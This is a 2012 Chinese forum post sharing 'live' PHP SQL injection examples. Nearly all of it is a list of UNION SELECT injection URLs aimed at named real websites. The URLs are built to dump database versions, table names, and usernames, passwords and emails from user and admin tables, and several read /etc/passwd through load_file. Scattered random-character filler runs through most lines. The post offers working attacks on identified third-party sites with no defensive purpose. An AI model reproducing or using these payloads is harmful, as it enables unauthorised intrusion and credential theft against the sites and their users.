灵活的php注入+活的实例演示! 老外那里挖的
1 y0 ]8 a4 [' e2 v. S. n9 q- x
9 ^2 Z! }7 p4 M S! yhttp://www.ihrc.org.uk/show.php?id=-99+UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13-- 5 X5 E' ~) Y6 r* v- E
http://www.witchcraft.nu/newsitem.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10-- 4 _( D: }7 t& z8 I! u' A
http://ccsmi.fas.sfu.ca/newsItem.php?id=-99+UNION+ALL+SELECT+1,2,3,version(),5,6,7,8--
t3 R2 P, t$ A8 mhttp://www.senesco.com/newsitem.php?id=-99+UNION+ALL+SELECT+1,2,3,table_name,5%20from%20information_schema.tables%20where%20table_schema=database ()-- . I; b% G0 R6 X! C, h0 w- b
http://www.hpcalc.org/details.php?id=-99+UNION+ALL+SELECT+1,concat_ws(0x3a,id,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29+from+users-- 6 t. h: A% b8 u
http://www.atlmetal.com/bands/band.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14-- 9 |* j5 U4 H W5 d% R
http://www.rocklab.it/band.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- ' w2 k! S( e) M8 `5 {* H6 W
http://www.bandlist24.de/band.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- . ]5 W. ^. @3 T8 P/ F
http://www.listenuppresident.com ... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1--
9 T: d6 o; Z' |, s. m1 G% B0 rhttp://www.hamdrams.co.uk/admin.php?id=-99+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11%20from%20phpbb_users-- T! g8 F# z! c( D5 V! T
http://www.correiagroup.com/agent.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12-- / _' K. w$ s" q+ L N" ]; O8 W
http://www.eralincolnrealty.net/ ... +UNION+ALL+SELECT+1,2,3,column_name,5,6,7%20from%20information_schema.columns%20where%20table_nam e='Agent'%20limit%205,1-- * u3 W" r* A Z4 s0 E7 |
http://www.estatesmall.com/real- ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15-- % @2 B; F# }7 D& ^7 |4 \
http://www.fourstarrealty.com/agent.php?id=-99+UNION+ALL+SELECT+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20admin-- . c$ |8 r( G' _. ^% B2 B
http://www.rpmre.com/arealsys/agent.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13--
6 _/ \! T* s! f% S7 ?1 q% rhttp://internet-shares.com/users.php?id=-99+UNION+ALL+SELECT+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users%20limit%201,1-- 4 Q) \$ G, c* {5 ^$ u4 L; H$ m
http://www.punkarchives.com/users.php?ID=-99+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,Email),3,4,5,6+from+users-- 6 `, K, Z/ Q: K8 V
http://www.memfis.eu/ko7e7a/users.php?id=-99+UNION+ALL+SELECT+1,2,concat_ws(0x3a,nick,name,email,text),4,5,6,7+from+users-- + \6 f0 j# Y7 a2 k. b
http://www.listenuppresident.com ... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1--
2 ^0 Y& Y5 \% |* z1 Thttp://www.newportcoastbroker.co ... +UNION+ALL+SELECT+1,2,unhex(hex(load_file(0x2F6574632F706173737764)))%20from%20mysql.user-- $ F8 e5 x& L3 m7 I2 ^" Q ?% ?5 r
http://www.gamesector.org/review.php?id=-83+UNION+ALL+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10--
& O4 Q( p! Y0 J- F) M$ G; Rhttp://www.bgra.net/2004/review.php?id=-12+UNION+ALL+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26--
* L; a; }/ B0 H" q/ E0 \. F! F$ e6 _http://www.btne.org/members.php?id=-6+UNION+ALL+SELECT+user(),database(),version()-- h; C$ |5 H" ~* w: p
http://cormaci.com/pat.php?id=-2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10--
: y2 r t7 p% [ [2 O/ i5 @http://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1,0x4E65757472616C69736564,database(),4,5,null,7,8,9-- + T% D/ U8 {" f" c4 D
http://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),database(),4,5,null,7,8,9+from+punbb_users+limit +1,1--
" s, N; t. Z. ^" e# l7 c/ [ {http://travalor.com/hunt.php?id=-3+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit +0,1--
1 A8 t: }; c/ c+ P, J9 S3 R% {! G: C4 z* @http://www.thefalesteam.com/sell.php?ID=-64+UNION+ALL+SELECT+1,2,3,4,5,6,unhex(hex(concat_ws(0x3a,version(),user(),database()))),8,9,10,11,12--
2 ]+ C0 ]6 J% z* jhttp://www.loffice.org/affiliate ... +UNION+ALL+SELECT+1,concat_ws(0x3a,nom,adresse,tel,mail,password),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+membre+limit+0,1--
( ^" W$ P* Q% g3 c. m, uhttp://haasbuilders.com/auth.php?id=-39+UNION+ALL+SELECT+1,concat_ws(0x3a,project_id,project_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from +projects+where+project_id+=+36-- - c- ^* ~1 o% ~) A) x$ B6 \
http://ocmusicfest09.com/artist/bio.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user_name,password,password_hint),8,9,10,11,12,13+from +deleterec--
3 g9 r( `% @" w) A' I: K# k- fhttp://www.theatreview.org.nz/re ... +UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3a,username,email,password),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+members+limit+0,1-- 4 K$ N2 _4 F) @( k2 X2 J
http://www.thebartend.com/drinks ... +UNION+ALL+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
# e7 a- }% s, c( |" n. B7 vhttp://turfwars2.com/user.php?id=-30+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+limit+1,1--
" @( |5 `& ~5 Z* M* J$ Lhttp://www.lingo.org.za/short.php?id=-40+UNION+ALL+SELECT+1,2,3,4,5,unhex(hex(password)),7,8,9+from+user-- % u5 L$ {, ^6 m6 A0 X1 H& q- |
http://www.lfks.org/halloffame.php?id=-15+UNION+ALL+SELECT+1,id,3,4,5,6,7+from+halloffame-- ) r" _" y4 b, U) F1 k* d7 _1 ?6 `5 P
http://www.spacefleetonline.com/ ... LL+SELECT+concat_ws(0x3a,user_name,real_name,email,address,password)+from+user+limit+0,1 --
% b' X9 b/ ^/ H: y+ ]7 nhttps://www.ncsy.ca/email.php?id=-7+UNION+ALL+SELECT+1,concat_ws(0x3a,version(),user(),database()),3--
4 J7 @* d& h1 ihttp://www.beaufortbooks.com/books.php?id=-53+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13+from+users+lim it+0,1--
# f# y8 y$ W& `* g9 e) N5 V$ Q/ {. B1 Ihttp://www.andytimmons.com/video.php?id=-0003+UNION+ALL+SELECT+1,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5,6,7,8--
( L+ Z; i8 H0 ^) L; m8 ~5 y9 }http://www.law-and-numbers.de/de ... +UNION+ALL+SELECT+1,null,3,null,0x4E65757472616C69736564,column_name,null,8,9+from+informatio n_schema.columns+limit+0,1-- 9 l4 C1 y0 _# }+ B0 i
http://www.uwtuib.com/members.php?id=53+UNION+ALL+SELECT+1,2,concat_ws(0x3a,lname,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32+from+members+limit+0,1-- 6 V6 R* ~( G$ o
http://www.retailtherapy.tv/video.php?id=-163+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a,id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+members--
j, h/ U5 s0 Q3 G: J- a" _http://www.notbbc.co.uk/janet/ms ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(concat_ws(0x3a,version(),user(),d atabase()))),14,15,16-- % h3 _! x* D6 t2 r0 J9 o, c U1 p
http://www.visitmaldives.com/FAQ/faq.php?Id=-4+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,password,email),4,5+from+users+limit+0,1--
) [" z: V. V: {/ `5 Z/ Ahttp://www.fair-media.info/reque ... ON+ALL+SELECT+unhex(hex(concat_ws(0x3a,version(),user(),database()))),2--
1 ]* J& h6 T3 a0 [3 `http://www.langsfordcenter.com/o ... +UNION+ALL+SELECT+1,2,concat_ws(0x3a,adminid,password)+from+admin_login+limit+2,1--
4 `$ H- u7 {0 O3 p/ `, [$ r3 f5 q, a+ yhttp://supersport-ci.com/scan.php?id=-42+UNION+ALL+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user())-- ) z& U* P5 q( h( c
http://www.thediamondworks.co.za ... +UNION+ALL+SELECT+1,2,version(),0x4E65757472616C69736564+from+admin--
7 f8 Y* R0 l$ ~* nhttp://www.nortec.no/stjordal/pc.php?id=-41+UNION+ALL+SELECT+1,2,table_name,4 from information_schema.tables where table_schema=database()--
0 T) Z: b1 {& o* c0 qhttp://www.webhoster4u.de/server ... +ALL+SELECT+version(),database()-- & \: l* l2 `7 | y1 j
http://ens.ewi.tudelft.nl/People ... +UNION+ALL+SELECT+1,2,3,4,5,table_name,7,8,9,10,11,12,13%20from%20information_schema.tables%20wher e%20table_schema=database()%20limit%200,1--
/ K/ d( Z; l. |8 ~- _, l6 bhttp://www.putridflowers.com/music.php?id=-17+UNION+ALL+SELECT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
; ?& m" p9 f% |; s9 F2 D0 @2 Fhttps://shop.invictusnetworks.co ... +UNION+ALL+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12-- ! m8 z$ X5 c- N# @% x, g* f
http://sandiegoscreensavers.com/ ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,concat_ws(0x 3a,discount_type,discount_category,discount_currpct,discount_value,discount_active,discount_ref,discount_expiration),77,78,79,80,81,82,83,84,85,86,87, 88+from+discount--
, a6 r% z# ]- ihttp://www.schoolbytes.com/summary.php?id=-99+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users-- ; ~" `7 t0 R9 _' M! R
http://www.toprightcorner.com/bio.php?id=-99+UNION+ALL+SELECT+1,2,3,4,4-- ( g/ o+ j: M& R- c P+ X) ?* q
http://www.wang-li.com/art.php?id=-118+UNION+ALL+SELECT+1,2,load_file(0x2F6574632F706173737764),4--
* Q; ^7 {* [" M+ p6 W' Bhttp://www.twisterella.com/indie ... +UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,0x4E65757472616C69736564,9,10, 11+from+users+limit+0,1-- : J, c @' p. E% N5 z
http://www.wan-t.cn/www/sec.php?id=-48+UNION+ALL+SELECT+1,2,3,4,5,6,7,0x4E65757472616C69736564-- 5 l& [3 x6 g+ I7 f! B. m+ w
http://www.womenastronomers.com/ ... N+ALL+SELECT+concat(username,0x3a,passwor d),2,3,4+from+users---3+UNION+ALL+SELECT+1,null,0x4E65757472616C69736564,4,concat_ws(0x3a,version(),user(),database())--
& N/ `: X: m+ L+ `8 X: b; nhttp://www.fclarchives.org.nz/re ... N+ALL+SELECT+concat(username,0x3a,password),2,3,4+from+users-- * b' g* }+ m1 @! e1 P; I# U8 b
http://www.erdelyikopo.net/text/text.php?id=-5+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,email,username,password,level)+from+members+limit+ 0,1--
8 b( k9 y) H! ]3 M$ ]: }http://eng.chiptronic.com/text.php?id=-9+UNION+ALL+SELECT+1,2,3,4,5,6,column_name,8,9,10,11,12-- 6 }, v9 i6 a$ w0 D
http://www.bitepublishing.co.uk/ ... +UNION+ALL+SELECT+1,concat_ws(0x3,user,pass,admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24+from+staff--
7 g/ D) h/ e' J5 C& W; y5 ~2 nhttp://www.drivers-download.com/ ... +UNION+ALL+SELECT+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10-- 2 n/ g' e5 [/ [* P* W: X+ `
http://www.consul.cc/email.php?id=-1068+UNION+ALL+SELECT+null,concat_ws(0x3a,email,password),3,4,5+from+Users+limit+3,1-- F( z0 D$ \; L' c& t/ e
http://www.f1latam.com/esp.php?id=-8+UNION+ALL+SELECT+1,0x4E65757472616C69736564,3,concat_ws(0x3a,version(),database(),user()),5,6--
5 C1 e# E7 K; y. g3 ~ F4 ]http://bia2.com/music-review/rev ... +UNION+ALL+SELECT+1,2,3,4,5,version(),7,8,9,10,11,12,13,14-- |
发表于 2012-9-15 14:43:34
收藏
支持
反对